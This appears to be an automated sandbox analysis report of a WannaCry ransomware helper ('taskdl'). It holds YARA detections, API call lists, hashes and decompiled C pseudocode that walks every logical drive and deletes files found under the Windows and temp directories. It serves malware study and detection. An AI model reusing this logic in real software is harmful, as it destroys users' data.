                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000032.00000000.3719845976.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000032.00000002.3721585139.000000000041F000.00000008.00000001.01000000.00000008.sdmp, Author: Joe Security


                                  Execution Graph

                                  Execution Coverage:24.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:20.2%
                                  Total number of Nodes:94
                                  Total number of Limit Nodes:1

                                  Callgraph

                                  Control-flow Graph

                                  C-Code - Quality: 55%
                                  			E00401080(intOrPtr _a4) {
                                  				void* _v4;
                                  				char _v16;
                                  				char _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v40;
                                  				char _v560;
                                  				struct _WIN32_FIND_DATAW _v632;
                                  				long _v1124;
                                  				long _v1644;
                                  				long _v1648;
                                  				char _v1656;
                                  				char _v1660;
                                  				void* _v1664;
                                  				void* _v1668;
                                  				char _v1672;
                                  				char _v1676;
                                  				void* _v1680;
                                  				char _v1681;
                                  				void* _v1684;
                                  				char _v1688;
                                  				intOrPtr _v1696;
                                  				intOrPtr _v1700;
                                  				intOrPtr _v1704;
                                  				intOrPtr _v1708;
                                  				void* _t54;
                                  				int _t57;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				WCHAR* _t65;
                                  				char _t72;
                                  				intOrPtr _t84;
                                  				void* _t100;
                                  				intOrPtr _t101;
                                  				intOrPtr _t103;
                                  				int _t105;
                                  				void* _t106;
                                  				intOrPtr _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t110;
                                  				void* _t112;
                                  				intOrPtr _t113;
                                  				intOrPtr _t115;
                                  				void* _t118;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00401AA7);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t115;
                                  				_v1676 = _v1681;
                                  				_v1672 = 0;
                                  				_v1668 = 0;
                                  				_v1664 = 0;
                                  				_v4 = 0;
                                  				_v1680 = 0;
                                  				E00401000(_a4,  &_v1124);
                                  				swprintf( &_v1644, 0x403040,  &_v1124, 0x403050);
                                  				_t118 = _t115 - 0x688 + 0x18;
                                  				_t54 = FindFirstFileW( &_v1644,  &(_v632.nFileSizeHigh)); // executed
                                  				_t112 = _t54;
                                  				if(_t112 != 0xffffffff) {
                                  					_t72 = _v1681;
                                  					do {
                                  						swprintf( &_v1644, 0x403034,  &_v1124,  &_v560);
                                  						_v1660 = _t72;
                                  						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                  						_t57 = wcslen( &_v1648);
                                  						_t118 = _t118 + 0x14;
                                  						_t105 = _t57;
                                  						__imp__?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z(_t105, 1);
                                  						if(_t57 != 0) {
                                  							E00401330(_v1668,  &_v1656, _t105);
                                  							_t118 = _t118 + 0xc;
                                  							__imp__?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z(_t105);
                                  						}
                                  						_v16 = 1;
                                  						E004013D0( &_v1688);
                                  						_v28 = 0;
                                  						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1, _v1680, 1,  &_v1672);
                                  					} while (FindNextFileW(_t112,  &_v632) != 0);
                                  					FindClose(_t112);
                                  					_t100 = 0;
                                  					_t106 = 0;
                                  					while(1) {
                                  						_t62 = _v1700;
                                  						_t84 = _v1696;
                                  						if(_t62 == 0 || _t100 >= _t84 - _t62 >> 4) {
                                  							break;
                                  						}
                                  						_t65 =  *(_t106 + _t62 + 4);
                                  						if(_t65 == 0) {
                                  							_t65 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                  						}
                                  						if(DeleteFileW(_t65) != 0) {
                                  							_v1708 = _v1708 + 1;
                                  						}
                                  						_t100 = _t100 + 1;
                                  						_t106 = _t106 + 0x10;
                                  					}
                                  					_t101 = _t62;
                                  					_t113 = _t84;
                                  					_t107 = _t62;
                                  					if(_t62 != _t84) {
                                  						do {
                                  							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
                                  							_t107 = _t107 + 0x10;
                                  						} while (_t107 != _t113);
                                  						_t62 = _v1704;
                                  					}
                                  					_v1696 = _t101;
                                  					_v32 = 0xffffffff;
                                  					_t108 = _t62;
                                  					if(_t62 != _t101) {
                                  						do {
                                  							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
                                  							_t108 = _t108 + 0x10;
                                  						} while (_t108 != _t101);
                                  						_t62 = _v1704;
                                  					}
                                  					E004018D0(_t62, _t62);
                                  					_t64 = _v1708;
                                  				} else {
                                  					_t103 = _v1668;
                                  					_t110 = _v1672;
                                  					_v4 = _t54;
                                  					if(_t110 != _t103) {
                                  						do {
                                  							_t54 = E00401870(_t110, 0);
                                  							_t110 = _t110 + 0x10;
                                  						} while (_t110 != _t103);
                                  						_t110 = _v1672;
                                  					}
                                  					E004018D0(_t54, _t110);
                                  					_t64 = 0;
                                  				}
                                  				 *[fs:0x0] = _v40;
                                  				return _t64;
                                  			}















































                                  APIs
                                    • Part of subcall function 00401000: GetWindowsDirectoryW.KERNEL32(00000019,00000104,76C50F00,00000019,004010D5,?,?,76C50F00,00000019,76C53300,00000000), ref: 0040100C
                                    • Part of subcall function 00401000: GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                    • Part of subcall function 00401000: wcslen.MSVCRT ref: 00401035
                                    • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040103F
                                    • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040104D
                                  • swprintf.MSVCRT(?,00403040,?,00403050,76C53300,00000000), ref: 004010F5
                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                  • swprintf.MSVCRT(?,00403034,?,?), ref: 00401168
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
                                  • wcslen.MSVCRT ref: 00401182
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(00000000), ref: 004011B6
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004011E7
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004011F6
                                  • FindClose.KERNEL32(00000000), ref: 00401205
                                  • DeleteFileW.KERNEL32(?), ref: 0040123A
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401258
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401282
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@wcslen$FileFind$swprintf$CloseDeleteDirectoryEos@?$basic_string@FirstGrow@?$basic_string@NextPathTempWindows
                                  • String ID:
                                  • API String ID: 2889739147-0
                                  • Opcode ID: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                  • Instruction ID: c02e7cbfb6260119d7520a8cc5a4b78e5b9d8733a8a6b2d1cbf059c3021fc26b
                                  • Opcode Fuzzy Hash: d094fdb74faa2036a2288d1d3d1a61125983eed402f55e78df214a8260d1f803
                                  • Instruction Fuzzy Hash: E551C3716043419FD720DF64C884B9BB7E9FBC8348F044A2EF589B32D1D6789945CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 71%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
                                  				CHAR* _v8;
                                  				intOrPtr* _v24;
                                  				intOrPtr _v28;
                                  				struct _STARTUPINFOA _v96;
                                  				int _v100;
                                  				char** _v104;
                                  				int _v108;
                                  				void _v112;
                                  				char** _v116;
                                  				intOrPtr* _v120;
                                  				intOrPtr _v124;
                                  				void* _t27;
                                  				intOrPtr _t36;
                                  				signed int _t38;
                                  				int _t40;
                                  				intOrPtr* _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t55;
                                  				intOrPtr _t58;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x4020a8);
                                  				_push(0x401a7c);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_v28 = _t58 - 0x68;
                                  				_v8 = 0;
                                  				__set_app_type(2);
                                  				 *0x403084 =  *0x403084 | 0xffffffff;
                                  				 *0x403088 =  *0x403088 | 0xffffffff;
                                  				 *(__p__fmode()) =  *0x403080;
                                  				 *(__p__commode()) =  *0x40307c;
                                  				 *0x40308c = _adjust_fdiv;
                                  				_t27 = E00401A7B( *_adjust_fdiv);
                                  				if( *0x403070 == 0) {
                                  					__setusermatherr(E00401A78);
                                  				}
                                  				E00401A66(_t27);
                                  				_push(0x40300c);
                                  				_push(0x403008);
                                  				L00401A60();
                                  				_v112 =  *0x403078;
                                  				__getmainargs( &_v100,  &_v116,  &_v104,  *0x403074,  &_v112);
                                  				_push(0x403004);
                                  				_push(0x403000);
                                  				L00401A60();
                                  				_t55 =  *_acmdln;
                                  				_v120 = _t55;
                                  				if( *_t55 != 0x22) {
                                  					while( *_t55 > 0x20) {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				} else {
                                  					do {
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  						_t42 =  *_t55;
                                  					} while (_t42 != 0 && _t42 != 0x22);
                                  					if( *_t55 == 0x22) {
                                  						L6:
                                  						_t55 = _t55 + 1;
                                  						_v120 = _t55;
                                  					}
                                  				}
                                  				_t36 =  *_t55;
                                  				if(_t36 != 0 && _t36 <= 0x20) {
                                  					goto L6;
                                  				}
                                  				_v96.dwFlags = 0;
                                  				GetStartupInfoA( &_v96);
                                  				if((_v96.dwFlags & 0x00000001) == 0) {
                                  					_t38 = 0xa;
                                  				} else {
                                  					_t38 = _v96.wShowWindow & 0x0000ffff;
                                  				}
                                  				_push(_t38);
                                  				_push(_t55);
                                  				_push(0);
                                  				_push(GetModuleHandleA(0));
                                  				_t40 = E004012C0();
                                  				_v108 = _t40;
                                  				exit(_t40); // executed
                                  				_t41 = _v24;
                                  				_t49 =  *((intOrPtr*)( *_t41));
                                  				_v124 = _t49;
                                  				_push(_t41);
                                  				_push(_t49);
                                  				L00401A5A();
                                  				return _t41;
                                  			}
























                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                  • Instruction ID: 68ab6ae738ded19f39d0610043d4fcd1ea5deb11ceedb7bb579f538117b6dbca
                                  • Opcode Fuzzy Hash: 4015c31cfa7eab49e8c51e62fd741af3e0d2f81cb378811d4cbcafae977c22e0
                                  • Instruction Fuzzy Hash: 42417EB5901344EFDB209FA4DA49A6ABFB8EB09715F20023FF581B72E1D6784940CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 58 4012c0-4012db GetLogicalDrives 59 4012e0-401303 58->59 60 401305-40130f GetDriveTypeW 59->60 61 40131e-401322 59->61 60->61 62 401311-40131c call 401080 Sleep 60->62 61->59 63 401324-40132d 61->63 62->61
                                  C-Code - Quality: 100%
                                  			E004012C0() {
                                  				intOrPtr _v4;
                                  				short _v8;
                                  				unsigned int _t8;
                                  				int _t13;
                                  				unsigned int _t15;
                                  				signed int _t21;
                                  				short* _t23;
                                  
                                  				_t23 =  &_v8;
                                  				_t8 = GetLogicalDrives(); // executed
                                  				_t15 = _t8;
                                  				_t21 = 0x19;
                                  				do {
                                  					_v8 =  *0x403060;
                                  					_v4 =  *0x403064;
                                  					_t3 = _t21 + 0x41; // 0x5a
                                  					_v8 = _t3;
                                  					if((_t15 >> _t21 & 0x00000001) != 0) {
                                  						_t13 = GetDriveTypeW( &_v8); // executed
                                  						if(_t13 != 4) {
                                  							E00401080(_t21);
                                  							_t23 =  &(_t23[2]);
                                  							Sleep(0xa); // executed
                                  						}
                                  					}
                                  					_t21 = _t21 - 1;
                                  				} while (_t21 >= 2);
                                  				return 0;
                                  			}











                                  APIs
                                  • GetLogicalDrives.KERNELBASE ref: 004012C7
                                  • GetDriveTypeW.KERNELBASE(?,?,?,?,00000000,?,0000000A), ref: 0040130A
                                    • Part of subcall function 00401080: swprintf.MSVCRT(?,00403040,?,00403050,76C53300,00000000), ref: 004010F5
                                    • Part of subcall function 00401080: FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                  • Sleep.KERNELBASE(0000000A,00000000,?,0000000A), ref: 0040131C
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: DriveDrivesFileFindFirstLogicalSleepTypeswprintf
                                  • String ID:
                                  • API String ID: 570308627-0
                                  • Opcode ID: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                  • Instruction ID: 4c7b1852939095ad3804a53ba97627e403d947e7219eb0394d6b0875d80bfcc1
                                  • Opcode Fuzzy Hash: fac8c12e3c7440fa081a6b1de2581f42964eb1eb3cef597a2f435b430f1423df
                                  • Instruction Fuzzy Hash: D9F0C8756043044BD310DF18ED4065B77A5EB99354F00053EED45B3390D776990DC6AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016EE
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016F6
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                  • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                  • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?), ref: 00401779
                                  • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000), ref: 004017BA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 2613176527-0
                                  • Opcode ID: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                  • Instruction ID: b735bfb2d4c14645f341b606901ad4f9af47e45cc28c7d2ea722b83d512bfbf9
                                  • Opcode Fuzzy Hash: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
                                  • Instruction Fuzzy Hash: 81410275300B008FC720DF19DAC4A6AB7E6FB89710B14897EE5569B7A0CB79AC01CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 96 401000-401020 GetWindowsDirectoryW 97 401022-40103c GetTempPathW wcslen 96->97 98 40105e-401070 swprintf 96->98 99 401073-401077 97->99 100 40103e-40104a wcslen 97->100 98->99 100->99 101 40104c-40105d wcslen 100->101
                                  C-Code - Quality: 100%
                                  			E00401000(intOrPtr _a4, wchar_t* _a8) {
                                  				wchar_t* _t11;
                                  				wchar_t* _t22;
                                  
                                  				_t22 = _a8;
                                  				GetWindowsDirectoryW(_t22, 0x104);
                                  				_t11 = _a4 + 0x41;
                                  				if(0 != _t11) {
                                  					swprintf(_t22, 0x403010, _t11, 0x403020);
                                  					goto L5;
                                  				} else {
                                  					GetTempPathW(0x104, _t22);
                                  					if(wcslen(_t22) <= 0 ||  *((short*)(_t22 + wcslen(_t22) * 2 - 2)) != 0x5c) {
                                  						L5:
                                  						return _t22;
                                  					} else {
                                  						 *((short*)(_t22 + wcslen(_t22) * 2 - 2)) = 0;
                                  						return _t22;
                                  					}
                                  				}
                                  			}






                                  APIs
                                  • GetWindowsDirectoryW.KERNEL32(00000019,00000104,76C50F00,00000019,004010D5,?,?,76C50F00,00000019,76C53300,00000000), ref: 0040100C
                                  • GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                  • wcslen.MSVCRT ref: 00401035
                                  • wcslen.MSVCRT ref: 0040103F
                                  • wcslen.MSVCRT ref: 0040104D
                                  • swprintf.MSVCRT(00000019,00403010,?,00403020), ref: 0040106A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: wcslen$DirectoryPathTempWindowsswprintf
                                  • String ID:
                                  • API String ID: 30654359-0
                                  • Opcode ID: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                  • Instruction ID: 00ede0775e497762771a1e7050bb3ecf99d0a0070f097ddb1d391ed7ba2ca3cf
                                  • Opcode Fuzzy Hash: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
                                  • Instruction Fuzzy Hash: ADF0C87170122067E7206B2CBD0AE9F77A8EF85315B01403AF786B62D0D2B55A5586EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 102 4013d0-4013ec 103 4013f2-4013f7 102->103 104 40152b-401538 102->104 107 401404 103->107 108 4013f9-401402 103->108 105 4015e7-4015e9 104->105 106 40153e-40154e 104->106 109 401682-401689 105->109 110 4015ef-401600 105->110 111 401550 106->111 112 40157c-40158c 106->112 113 401406-401408 107->113 108->107 108->113 114 401602-401614 call 401690 110->114 115 40161e-401627 110->115 116 401554-401572 call 401690 111->116 119 4015a6-4015ad 112->119 120 40158e-40159c call 401690 112->120 117 40140a-40140c 113->117 118 40140e-401410 113->118 140 401616-40161a 114->140 125 401629-401645 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 115->125 126 40164f-401656 115->126 141 401574-401578 116->141 127 401413-40141b 117->127 118->127 121 4015b3-4015cb ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 119->121 122 40167f 119->122 137 40159e-4015a2 120->137 121->121 129 4015cd-4015e4 121->129 122->109 125->125 132 401647-40164b 125->132 126->122 133 401658 126->133 134 40141d 127->134 135 40141f-40143e ??2@YAPAXI@Z 127->135 132->126 142 40165c-401675 ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z 133->142 134->135 138 401440-401456 call 401690 135->138 139 401458-40145c 135->139 137->119 138->139 145 40147e-40148f 139->145 146 40145e 139->146 140->115 141->112 142->142 143 401677-40167b 142->143 143->122 149 401491 145->149 150 4014b5-4014bd 145->150 148 401462-40147c call 401690 146->148 148->145 152 401495-4014b3 call 401690 149->152 153 4014d0-4014f1 call 4018d0 150->153 154 4014bf-4014ce ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 150->154 152->150 160 4014f3-401509 153->160 161 40150c-401528 153->161 154->153 154->154
                                  C-Code - Quality: 57%
                                  			E004013D0(signed int __ecx) {
                                  				signed int _t67;
                                  				signed int _t68;
                                  				signed int _t73;
                                  				signed int _t77;
                                  				signed int _t78;
                                  				signed int _t79;
                                  				intOrPtr _t81;
                                  				intOrPtr _t91;
                                  				intOrPtr _t95;
                                  				intOrPtr _t98;
                                  				signed int _t99;
                                  				intOrPtr _t101;
                                  				signed int _t104;
                                  				intOrPtr _t105;
                                  				signed int _t106;
                                  				intOrPtr _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t116;
                                  				intOrPtr _t119;
                                  				intOrPtr _t121;
                                  				signed int _t127;
                                  				intOrPtr _t135;
                                  				signed int _t136;
                                  				void* _t139;
                                  				intOrPtr _t140;
                                  				void* _t141;
                                  				void* _t142;
                                  				intOrPtr _t143;
                                  				intOrPtr _t144;
                                  				void* _t146;
                                  				signed int _t147;
                                  				intOrPtr _t148;
                                  				signed int _t149;
                                  				signed int _t151;
                                  				intOrPtr _t152;
                                  				signed int _t153;
                                  				intOrPtr _t154;
                                  				intOrPtr _t155;
                                  				intOrPtr _t156;
                                  				signed int _t157;
                                  				intOrPtr _t158;
                                  				signed int _t159;
                                  				void* _t160;
                                  				void* _t161;
                                  
                                  				_t109 = __ecx;
                                  				_t144 =  *((intOrPtr*)(__ecx + 8));
                                  				_t136 =  *(_t160 + 0x24);
                                  				_t67 =  *((intOrPtr*)(__ecx + 0xc)) - _t144 >> 4;
                                  				 *(_t160 + 0x10) = __ecx;
                                  				if(_t67 >= _t136) {
                                  					_t104 =  *(_t160 + 0x20);
                                  					if(_t144 - _t104 >> 4 >= _t136) {
                                  						if(_t136 > 0) {
                                  							_t68 = _t136 << 4;
                                  							_t139 = _t144 - _t68;
                                  							_t156 = _t144;
                                  							 *(_t160 + 0x20) = _t68;
                                  							if(_t139 == _t144) {
                                  								L37:
                                  								_t140 =  *((intOrPtr*)(_t109 + 8));
                                  								_t146 = _t140 - _t68;
                                  								if(_t104 == _t146) {
                                  									L40:
                                  									_t141 = _t68 + _t104;
                                  									_t147 = _t104;
                                  									if(_t104 == _t141) {
                                  										goto L44;
                                  									}
                                  									_t105 =  *((intOrPtr*)(_t160 + 0x28));
                                  									do {
                                  										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t105, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
                                  										_t147 = _t147 + 0x10;
                                  									} while (_t147 != _t141);
                                  									_t109 =  *(_t160 + 0x10);
                                  									_t68 =  *(_t160 + 0x20);
                                  									goto L44;
                                  								} else {
                                  									goto L38;
                                  								}
                                  								do {
                                  									L38:
                                  									_t146 = _t146 - 0x10;
                                  									_t140 = _t140 - 0x10;
                                  									__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t146, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
                                  								} while (_t146 != _t104);
                                  								_t109 =  *(_t160 + 0x10);
                                  								_t68 =  *(_t160 + 0x20);
                                  								goto L40;
                                  							} else {
                                  								goto L35;
                                  							}
                                  							do {
                                  								L35:
                                  								E00401690(__ecx, _t156, _t139);
                                  								_t139 = _t139 + 0x10;
                                  								_t160 = _t160 + 8;
                                  								_t156 = _t156 + 0x10;
                                  							} while (_t139 != _t144);
                                  							_t109 =  *(_t160 + 0x10);
                                  							_t68 =  *(_t160 + 0x20);
                                  							goto L37;
                                  						}
                                  						return _t67;
                                  					} else {
                                  						_t157 = _t104;
                                  						_t68 = _t136 << 4;
                                  						 *(_t160 + 0x20) = _t68;
                                  						_t127 = _t68 + _t104;
                                  						if(_t104 != _t144) {
                                  							 *(_t160 + 0x24) = _t127;
                                  							do {
                                  								E00401690(_t109,  *(_t160 + 0x24), _t157);
                                  								_t116 =  *((intOrPtr*)(_t160 + 0x2c));
                                  								_t157 = _t157 + 0x10;
                                  								_t160 = _t160 + 8;
                                  								_t109 = _t116 + 0x10;
                                  								 *(_t160 + 0x24) = _t116 + 0x10;
                                  							} while (_t157 != _t144);
                                  							_t68 =  *(_t160 + 0x20);
                                  							_t109 =  *(_t160 + 0x10);
                                  						}
                                  						_t148 =  *((intOrPtr*)(_t109 + 8));
                                  						_t158 =  *((intOrPtr*)(_t160 + 0x28));
                                  						_t142 = _t136 - (_t148 - _t104 >> 4);
                                  						if(_t142 != 0) {
                                  							do {
                                  								E00401690(_t109, _t148, _t158);
                                  								_t160 = _t160 + 8;
                                  								_t148 = _t148 + 0x10;
                                  								_t142 = _t142 - 1;
                                  							} while (_t142 != 0);
                                  							_t68 =  *(_t160 + 0x20);
                                  							_t109 =  *(_t160 + 0x10);
                                  						}
                                  						_t143 =  *((intOrPtr*)(_t109 + 8));
                                  						_t149 = _t104;
                                  						if(_t104 == _t143) {
                                  							L44:
                                  							 *((intOrPtr*)(_t109 + 8)) =  *((intOrPtr*)(_t109 + 8)) + _t68;
                                  							return _t68;
                                  						} else {
                                  							goto L31;
                                  						}
                                  						do {
                                  							L31:
                                  							__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t158, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
                                  							_t149 = _t149 + 0x10;
                                  						} while (_t149 != _t143);
                                  						_t115 =  *(_t160 + 0x10);
                                  						_t73 =  *(_t160 + 0x20);
                                  						 *((intOrPtr*)(_t115 + 8)) =  *((intOrPtr*)( *(_t160 + 0x10) + 8)) + _t73;
                                  						return _t73;
                                  					}
                                  				} else {
                                  					_t117 =  *((intOrPtr*)(__ecx + 4));
                                  					if(_t117 == 0) {
                                  						L3:
                                  						_t77 = _t136;
                                  					} else {
                                  						_t77 = _t144 - _t117 >> 4;
                                  						if(_t136 >= _t77) {
                                  							goto L3;
                                  						}
                                  					}
                                  					if(_t117 != 0) {
                                  						_t151 = _t144 - _t117 >> 4;
                                  					} else {
                                  						_t151 = 0;
                                  					}
                                  					_t78 = _t77 + _t151;
                                  					 *(_t160 + 0x14) = _t78;
                                  					if(_t78 < 0) {
                                  						_t78 = 0;
                                  					}
                                  					_t79 = _t78 << 4;
                                  					_push(_t79);
